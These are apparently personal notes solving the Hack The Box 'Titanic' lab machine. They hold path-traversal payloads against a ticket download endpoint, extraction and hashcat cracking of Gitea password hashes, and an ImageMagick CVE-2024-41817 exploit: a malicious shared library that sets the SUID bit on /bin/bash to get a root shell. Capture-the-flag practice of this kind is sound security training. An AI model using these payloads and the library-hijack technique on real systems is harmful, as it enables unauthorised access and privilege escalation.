Here is my note on TITANIC box from Hackthebox.
10.129.124.239: TITANIC
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 73039c76eb04f1fec9e980449c7f1346 (ECDSA)
|_ 256 d5bd1d5e9a861ceb88634d5f884b7e04 (ED25519)
#FROM GITEA Database Hash Cracking:
hashcat -m 10900 hashes.txt /usr/share/wordlists/rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
developer:25282528
ssh developer@titanic.htb
developer@titanic:~$ whoami
developer
developer@titanic:~$ hostname
titanic
USER-SHELL !
developer@titanic:~$ whoami
developer
developer@titanic:~$ hostname
titanic
developer@titanic:~$ ls
gitea mysql user.txt
developer@titanic:~$ cat user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
no sudo -l
no crontab.
GCC enabled
developer@titanic:/opt$ ls
app containerd scripts
developer@titanic:/opt$ ls -lah
total 20K
drwxr-xr-x 5 root root 4.0K Feb 7 10:37 .
drwxr-xr-x 19 root root 4.0K Feb 7 10:37 ..
drwxr-xr-x 5 root developer 4.0K Feb 7 10:37 app
drwx--x--x 4 root root 4.0K Feb 7 10:37 containerd
drwxr-xr-x 2 root root 4.0K Feb 7 10:37 scripts
developer@titanic:/opt$ cd scripts
developer@titanic:/opt/scripts$ ls
identify_images.sh
developer@titanic:/opt/scripts$ ls -lah
total 12K
drwxr-xr-x 2 root root 4.0K Feb 7 10:37 .
drwxr-xr-x 5 root root 4.0K Feb 7 10:37 ..
-rwxr-xr-x 1 root root 167 Feb 3 17:11 identify_images.sh
developer@titanic:/opt/scripts$ cat identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
identify_images.sh is a very interesting file.
ImageMagick CVE-2024-41817 PRIV ESC NOTES:
ImageMagick 7.1.1-35
It's vulnerable to Arbitary Code Execution !
https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8
developer@titanic:/tmp$ gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
EOF
developer@titanic:/tmp$ ls
c systemd-private-551971bda54d44a2928e727d6e46d529-ModemManager.service-DU1YVN
libxcb.so.1 systemd-private-551971bda54d44a2928e727d6e46d529-systemd-logind.service-4z3w9n
pspy64s systemd-private-551971bda54d44a2928e727d6e46d529-systemd-resolved.service-ykGqKx
snap-private-tmp systemd-private-551971bda54d44a2928e727d6e46d529-systemd-timesyncd.service-tfTkSo
ssh_client_ip_developer test.xml
systemd-private-551971bda54d44a2928e727d6e46d529-apache2.service-2E0WsI vmware-root_616-2689143977
developer@titanic:/tmp$ magick /dev/null /dev/null
uid=1000(developer) gid=1000(developer) groups=1000(developer)
The exploit works !
developer@titanic:/opt/app/static/assets/images$ cd /opt/app/static/assets/images
developer@titanic:/opt/app/static/assets/images$ gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("chmod u+s /bin/bash");
exit(0);
}
EOF
developer@titanic:/opt/app/static/assets/images$ cp home.jpg home2.jpg
developer@titanic:/opt/app/static/assets/images$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
developer@titanic:/opt/app/static/assets/images$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
developer@titanic:/opt/app/static/assets/images$ ls
entertainment.jpg exquisite-dining.jpg favicon.ico home2.jpg home.jpg libxcb.so.1 luxury-cabins.jpg metadata.log
developer@titanic:/opt/app/static/assets/images$ gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("chmod u+s /bin/bash");
exit(0);
}
EOF
developer@titanic:/opt/app/static/assets/images$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
developer@titanic:/opt/app/static/assets/images$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
#Make sure to do the exploit in /opt/app/static/assets/images directory.
developer@titanic:/opt/app/static/assets/images$ /bin/bash -p
bash-5.1# cd /root
bash-5.1# ls
cleanup.sh images revert.sh root.txt snap
bash-5.1# whoami
root
bash-5.1# hostname
titanic
bash-5.1# pwd
/root
bash-5.1# ls
cleanup.sh images revert.sh root.txt snap
bash-5.1# cat root.txt
[REDIRECTED]
ROOT-SHELL !
ROOT.TXT: [REDIRECTED]
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://titanic.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Titanic Booking System
Conisder XXE ? - Maybe later.
NOPE, NO XXE however if you submit the ticket with name or whatever.
You will leads to GET /download?ticket=bc136ef7-3fe3-469b-8ec8-89ca7a1455a6.json
/download?ticket=../../../../../etc/passwd = WORKS !
LFI Vulnerability Discovered !
ffuf -u http://titanic.htb/download?ticket=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
#NO LOG POISONING = /var/log/apache2/access.log = DON'T BOTHER !
#NO LFI SSH id_rsa
#I think you have to LFI to gitea data or something.
LFI TO GITEA Config and Database files: Titanic-HTB
#From dev.titanic.htb:
/home/developer/gitea/data
Default gitea config file:
/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini:
[SNIP]
[database]
PATH = /data/gitea/gitea.db
DB_TYPE = sqlite3
HOST = localhost:3306
NAME = gitea
USER = root
PASSWD =
LOG_SQL = false
SCHEMA =
SSL_MODE = disable
[SNIP]
/download?ticket=../../../../../home/developer/gitea/data/gitea/gitea.db - WORKS and it's a sqlite3 file
wget http://titanic.htb//download?ticket=../../../../../home/developer/gitea/data/gitea/gitea.db -O gitea.db
sqlite3 gitea.db
Gitea Database Password Cracking:
https://www.unix-ninja.com/p/cracking_giteas_pbkdf2_password_hashes
https://raw.githubusercontent.com/unix-ninja/hashcat/refs/heads/master/tools/gitea2hashcat.py
sqlite> select * from user;
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0
2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0
3|qwop|qwop||qwop@qwop.com|0|enabled|77b5fd3015cb3c747484008bf266b2d02f833cb44d731610a233d460f56d1d38c41927088f4ef5d33ad90c52f24e7bf32820|pbkdf2$50000$50|0|0|0||0|||e74aff81f8b579140975f1768374696b|9a0e0081727ab333a1980e58f9b0fa78|en-US||1740681234|1740683709|1740681234|0|-1|1|0|0|0|0|1|0|957575b617558e930da07bae87bb82fc|qwop@qwop.com|0|0|0|0|0|0|0|0|0|unified|gitea-auto|0
sqlite> select email,salt,passwd,passwd_hash_algo from user;
root@titanic.htb|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50
developer@titanic.htb|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50
qwop@qwop.com|9a0e0081727ab333a1980e58f9b0fa78|77b5fd3015cb3c747484008bf266b2d02f833cb44d731610a233d460f56d1d38c41927088f4ef5d33ad90c52f24e7bf32820|pbkdf2$50000$50
sqlite3 gitea.db 'select salt,passwd from user;' | python3 gitea2hashcat.py
[+] Run the output hashes through hashcat mode 10900 (PBKDF2-HMAC-SHA256)
sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
sha256:50000:mg4AgXJ6szOhmA5Y+bD6eA==:d7X9MBXLPHR0hACL8may0C+DPLRNcxYQojPUYPVtHTjEGScIj0710zrZDFLyTnvzKCA=
sqlite3 gitea.db 'select salt,passwd from user;' | python3 gitea2hashcat.py > hashes.txt
┌──(root㉿kali)-[/home/kali/BOXES/TITANIC]
└─# sqlite3 gitea.db 'select email,salt,passwd,passwd_hash_algo from user;'
root@titanic.htb|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50
developer@titanic.htb|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50
qwop@qwop.com|9a0e0081727ab333a1980e58f9b0fa78|77b5fd3015cb3c747484008bf266b2d02f833cb44d731610a233d460f56d1d38c41927088f4ef5d33ad90c52f24e7bf32820|pbkdf2$50000$50
┌──(root㉿kali)-[/home/kali/BOXES/TITANIC]
└─# python3 gitea2hashcat.py "8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56"
[+] Run the output hashes through hashcat mode 10900 (PBKDF2-HMAC-SHA256)
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
┌──(root㉿kali)-[/home/kali/BOXES/TITANIC]
└─# python3 gitea2hashcat.py "8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56" > hashes.txt
hashcat -m 10900 hashes.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt
hashcat -m 10900 hashes.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt
hashcat -m 10900 hashes.txt /usr/share/wordlists/rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
developer:25282528
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://titanic.htb/ -H "Host: FUZZ.titanic.htb"
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://titanic.htb/ -H "Host: FUZZ.titanic.htb" --fc 301
[SNIP]
dev [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 214ms]
[SNIP]
dev.titanic.htb = Gitea !
dev.titanic.htb:
Create an account to check out public repositories as usual.
Found Developer / flask-app which is the source code of main titanic.htb site which titanic booking system.
Gitea version 1.22.1
Will check out gitea for more later on.
Found Developer / docker-config:
docker-config/gitea/docker-compose.yml:
version: '3'
services:
gitea:
image: gitea/gitea
container_name: gitea
ports:
- "127.0.0.1:3000:3000"
- "127.0.0.1:2222:22" # Optional for SSH access
volumes:
- /home/developer/gitea/data:/data # Replace with your path
environment:
- USER_UID=1000
- USER_GID=1000
restart: always
/home/developer/gitea/data - Very Interesting Path Directory.
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel